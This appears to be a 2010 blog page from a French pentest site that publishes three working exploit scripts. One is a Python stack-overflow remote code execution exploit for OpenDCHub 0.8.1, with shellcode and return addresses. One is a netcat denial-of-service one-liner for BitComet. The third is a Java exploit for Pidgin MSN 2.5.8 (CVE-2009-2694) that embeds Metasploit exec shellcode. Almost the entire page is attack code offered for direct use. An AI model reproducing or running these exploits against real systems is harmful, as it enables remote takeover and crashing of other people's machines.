OpenDCHub 0.8.1 Remote Code Execution Exploit

Pierre — Wed, 31 Mar 2010 11:54:42 +0000

#!/usr/bin/python
#
# OpenDcHub 0.8.1 Remote Code Execution Exploit
# Pierre Nogues - http://www.indahax.com
#
# Description:
#     OpenDcHub is a direct connect hub for Linux
#
#     OpenDcHub doesn't handle specially crafted MyINFO message which lead to a stack overflow.
#
# Affected versions :
#     OpenDcHub 0.8.1
#
# Plateforms :
#     Unix
#
# Usage :
#     ./exploit.py
 
import socket
 
host = '192.168.1.9'
port = 5000
 
# must not contain \x36 \x53 \x00 bytes
# max shellcode size = 103 bytes use exploit v2 otherwise
shellcode="\x33\xc9\xb1\x13\xba\xf6\x1d\xe7\xfa\xdb\xde\xd9\x74\x24" 
shellcode+="\xf4\x5e\x83\xc6\x04\x31\x56\x0a\x03\xa0\x17\x05\x0f\x7d" 
shellcode+="\xf3\x3e\x13\x2e\x40\x92\xbe\xd2\xcf\xf5\x8f\xb4\x02\x75" 
shellcode+="\xb4\x66\xf5\xb6\xe3\x97\x37\x51\x9c\x86\x6b\xfb\x0f\xc2" 
shellcode+="\x83\x52\xe0\x9b\x45\x17\x6a\xfd\xdd\x55\xea\x58\x59\xbc" 
shellcode+="\x5b\x65\xa8\xbf\xd5\xe0\xcb\x90\x8d\x3d\x03\x62\x26\x29" 
shellcode+="\x74\xe6\xdf\xc7\x03\x05\x4f\x44\x9d\x2b\xc0\x61\x50\x2b" 
shellcode+="\x2b"
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send("$ValidateNick joseph|")
 
hax="$MyINFO $ALL joseph "
hax+=shellcode
for i in range(103 - len(shellcode)):
    hax+="A"
hax+="$"
hax+="\x20\x81\x81\x80" # esp
hax+="\xed\xf6\xfe\xbf" # eip
hax+="S:-1|"
 
s.send(hax)
s.close()
 
"""
# V2
# more complex version working too, it have more space for the shellcode
 
hax="$MyINFO $ALL joseph AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
hax+="\xFF\xFF\xFF\xFE" # local var int len of commands.c:my_info() must be a negative value
hax+="TTTTUUUUVVVVWWWWXXXXYYYYZZZZBBBBCCCCEEEEEEE$"
hax+="\x20\x81\x81\x80" # esp
hax+="\x80\xf7\xfe\xbf" # eip
hax+="\xCC\xCC\xCC\xCC" # useless var
hax+="\x10\xf0\xfe\xbf" # this address + x20 will be overwritten by 4 bytes
# shellcode time
hax+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
hax+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
hax+=shellcode
hax+="|"
"""

BitComet

Pierre — Wed, 31 Mar 2010 11:52:02 +0000

#!/bin/sh
#
# BitComet <= 1.19 Remote DOS Exploit
# Pierre Nogues - http://www.indahax.com/
# 
# Description:
#     BitComet is a torrent client
#
#     BitComet doesn't handle malicious DHT packet with an invalid bencoded message.
#
# Affected versions :
#     BitComet <= 1.19
#
# Plateforms :
#     Windows
#
# Usage :
#     ./exploit.sh ip port
 
if [ $# -ne 2 ]; then
    echo "./exploit.sh ip port"
    exit 1
fi
 
nc -u $1 $2 << .
d4294967285:y1:q1:t4:\x001:q4:ping1:ad2:id20:01234567890123456789ee
.

Exploit Pidgin MSN 2.5.8 exécution de code à distance

Pierre — Sat, 14 Nov 2009 15:48:46 +0000

/*
* Pidgin MSN <= 2.5.8 Remote Code Execution
*
* Pierre Nogues - pierz@hotmail.it
* http://www.indahax.com/
*
*
* Description:
*        Pidgin is a multi-protocol Instant Messenger.
*
*        This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2].
*        The library "libmsn" used by pidgin doesn't handle specially crafted MsnSlp packets
*        which could lead to memory corruption.
*
* Affected versions :
*        Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.
*
* Plateforms :
*        Windows, Linux, Mac
*
* Fix :
*        Fixed in Pidgin 2.5.9
*        Update to the latest version : http://www.pidgin.im/download/
*
* References :
*        [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694
*        [2] http://www.coresecurity.com/content/libpurple-arbitrary-write
*        [3] http://www.pidgin.im/news/security/?id=34
*
* Usage :
*        You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/
*        javac.exe -cp "%classpath%;.\jml-1.0b3-full.jar" PidginExploit.java
*        java -cp "%classpath%;.\jml-1.0b3-full.jar" PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL
*
*/
 
import net.sf.jml.*;
import net.sf.jml.event.*;
import net.sf.jml.impl.*;
import net.sf.jml.message.p2p.*;
import net.sf.jml.util.*;
 
public class PidginExploit {
 
   private MsnMessenger messenger;
   private String login;
   private String password;
   private String target;
 
   private int session_id = NumberUtils.getIntRandom();
 
   private byte shellcode[] = new byte[] {
 
           /*
            * if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom !
            * sub esp,500
            */
               (byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,
 
 
           /*
            * windows/exec - 121 bytes
            * http://www.metasploit.com
            * EXITFUNC=process, CMD=calc.exe
            */
               (byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,
               (byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,
               (byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,
               (byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,
               (byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,
               (byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,
               (byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,
               (byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,
               (byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,
               (byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,
               (byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,
               (byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,
               (byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,
               (byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,
               (byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,
               (byte) 0x00
           };
 
   // reteip = pointer to the return address in the stack
   // The shellcode will be wrote just before reteip
   // and reteip will automaticly point to the shellcode. It's magic !
   private int reteip = 0x0022CFCC;    //stack on XP SP3-FR Pidgin 2.5.8
 
   private int neweip;
   private byte[] payload = new byte[shellcode.length + 4];
   private int totallength = reteip + 4;
 
   public static void main(String[] args) throws Exception {
 
       if(args.length != 3){
           System.out.println("PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL");
       }else{
           PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]);
           exploit.start();
       }
 
   }
 
   public PidginExploit(String login, String password, String target){
       this.login = login;
       this.password = password;
       this.target = target;
 
       neweip = reteip - shellcode.length ;
 
       for(int i=0;i<shellcode.length;i++)
           payload[i] = shellcode[i];
 
       payload[shellcode.length] = (byte)(neweip & 0x000000FF);
       payload[shellcode.length + 1] = (byte)((neweip & 0x0000FF00) >> 8);
       payload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16);
       payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24);
   }
 
   public void start() {
       messenger = MsnMessengerFactory.createMsnMessenger(login,password);
       messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);
 
       messenger.setLogIncoming(false);
       messenger.setLogOutgoing(false);
 
       initMessenger(messenger);
       messenger.login();
   }
 
   protected void initMessenger(MsnMessenger messenger) {
 
   messenger.addContactListListener(new MsnContactListAdapter() {
 
           public void contactListInitCompleted(MsnMessenger messenger) {
 
               final Object id = new Object();
 
               messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {
 
                   public void switchboardStarted(MsnSwitchboard switchboard) {
 
                       if (id != switchboard.getAttachment())
                           return;
 
                       switchboard.inviteContact(Email.parseStr(target));
                   }
 
                   public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {
                       if (id != switchboard.getAttachment())
                           return;
 
                       MsnP2PSlpMessage msg = new MsnP2PSlpMessage();
                       msg.setIdentifier(NumberUtils.getIntRandom());
                       msg.setSessionId(session_id);
                       msg.setOffset(0);
                       msg.setTotalLength(totallength);
                       msg.setCurrentLength(totallength);
 
                       // This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null
                       // We'll use this buffer to rewrite memory in the stack
                       msg.setFlag(0x1000020);
 
                       msg.setP2PDest(target);
 
                       switchboard.sendMessage(msg);
 
                       System.out.println("First packet sent, waiting for the ACK");
 
                   }
 
                   public void switchboardClosed(MsnSwitchboard switchboard) {
                       System.out.println("switchboardClosed");
                       switchboard.getMessenger().removeSwitchboardListener(this);
                   }
 
                   public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){
                       System.out.println("contactLeaveSwitchboard");
                   }
               });
               messenger.newSwitchboard(id);
           }
       });
 
       messenger.addMessageListener(new MsnMessageAdapter(){
 
           public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {
 
               //We receive the ACK of our first packet with the ID of the new bogus packet
               message.getIdentifier();
 
               MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,
                       payload.length, payload, target);
 
               switchboard.sendMessage(msg);
               System.out.println("ACK received && Payload sent !");
               System.out.println("Exploit OK ! CTRL+C to quit");
 
           }
       });
 
 
 
       messenger.addMessengerListener(new MsnMessengerAdapter() {
 
           public void loginCompleted(MsnMessenger messenger) {
               System.out.println(messenger.getOwner().getEmail() + " login");
           }
 
           public void logout(MsnMessenger messenger) {
               System.out.println(messenger.getOwner().getEmail() + " logout");
           }
 
           public void exceptionCaught(MsnMessenger messenger,
                   Throwable throwable) {
               System.out.println("caught exception: " + throwable);
           }
       });
 
   }
}

Pentest, hacking, sécurité informatique » Exploits

OpenDCHub 0.8.1 Remote Code Execution Exploit

BitComet

Exploit Pidgin MSN 2.5.8 exécution de code à distance